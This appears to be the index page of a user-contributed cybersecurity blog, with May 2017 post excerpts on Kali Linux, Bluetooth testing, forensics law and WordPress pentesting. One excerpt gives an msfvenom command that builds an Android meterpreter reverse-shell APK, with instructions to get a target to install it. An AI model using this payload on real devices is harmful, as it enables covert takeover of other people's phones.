0P3N Blog

Cybrary’s Open Blog is a user contributed cybersecurity knowledge base that brings together content highlighting the latest tools, exploits, technologies and insights in the industry.

Cyber-forensics: How the 4th and 5th Amendments "fit in"
By: msab95
May 5, 2017

How Digital Crimes Fit with the Current Legal System Crimes have been evolving throughout our history, as there are new secure ways created to protect the society, the criminals are getting smarter in breaking these new ways. Society till the late 19 th century consisted of all physical items such as paper files, ...

Atom for Elite Coders - Part 1
By: y3bg0l
May 4, 2017

Today I’ll show you how to be more efficient and faster when you want to code. My secret is Atom, an open source text editor, used by the majority of elite coders under the same vim, sublime text etc. Atom has the particularity to contain thousands of packages that will make your job easier. You can download it at, ...

Ubertooth One
By: bachan
May 4, 2017

Bluetooth is a very useful and attracting technology and The Ubertooth One is an open source and widely available Bluetooth testing and research tool. Every Bluetooth device has a 48-bit unique Bluetooth device address, as it's mac address, which consists of 3 sections. Non-significant address part (NSP), upper address part (UAP) and lower address part (LAP). In order to connect to a ...

4. Ethical Hacking with Kali Linux – Updates and GEDIT
By: Priyank Gada
May 4, 2017

In this chapter, we are going to install updates and upgrade our kali Linux install. We will also install Gedit. We will also learn some basic commands for installing, updating and upgrading packages in Linux. What is Gedit? Gedit is a graphical user interface text editor. We are going to use this editor in our course. GEDIT is simple ...

Reading and Outputting from a File in Juliar
By: Rattar
May 3, 2017

This tutorial assumes you have the latest version of Juliar downloaded on your computer. If not, please see previous tutorials. Hello Cybrarians and RatTeamsters,In today's tutorial, we will be learning how to quickly grab contents of the file and output it onto the screen.Here are the commands we will be using: __getByteFromString ...

3. Ethical Hacking with Kali Linux - Kali Linux
By: Priyank Gada
May 2, 2017

What is Kali Linux? Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing . Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, etc Should I ...

Remembering a Part of InfoSec History: Rebecca Bace Memorial
By: Olivia
May 2, 2017

There are many past events and people who have attributed to the field of Information Security, and as Cybrary begins to explore some of the key players and happenings that got the industry to where it is today, we felt it important to remember one significant contributor, Rebecca ‘Becky’ Bace.Becky Bace has had a significant impact of the security ...

Tutorial: Accessing Android Devices
By: Stryker
May 2, 2017

Android smartphones (Hack)/(Takeover) 19Create a payload by typing the information below. Number 1, should be saved in your home folder.1. msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=8888 R> Manjohn.apk The manjohn.apk file you send to your target, get them to install it.This will create the payload called program.apk (or whatever you name it), where you see the IP and port you need ...

The Emergence of Hacking
May 2, 2017

Hacking began in the 1960s at MIT when students attempted to learn more about mainframe computing systems and improve their skills.The telephone systems were tempting to phreakers, and John Draper, known as Captain Crunch, used a whistle packaged in Captain Crunch cereal to generate a 2600 Hertz tone that allowed access to AT&T long distance network. This discovery led ...

How to do Penetration Testing with your WordPress Website
By: gurubaran
May 1, 2017

WordPress is a free online Open source content Managed system focused on PHP and MySQL. It is one the powerful and most used blogging tool.As there is too many up’s and down’s in WordPress usage, it requires a security improvement, so the penetration test is essential to find the vulnerabilities and to secure you WordPress powered blog.Security researcher Daniel ...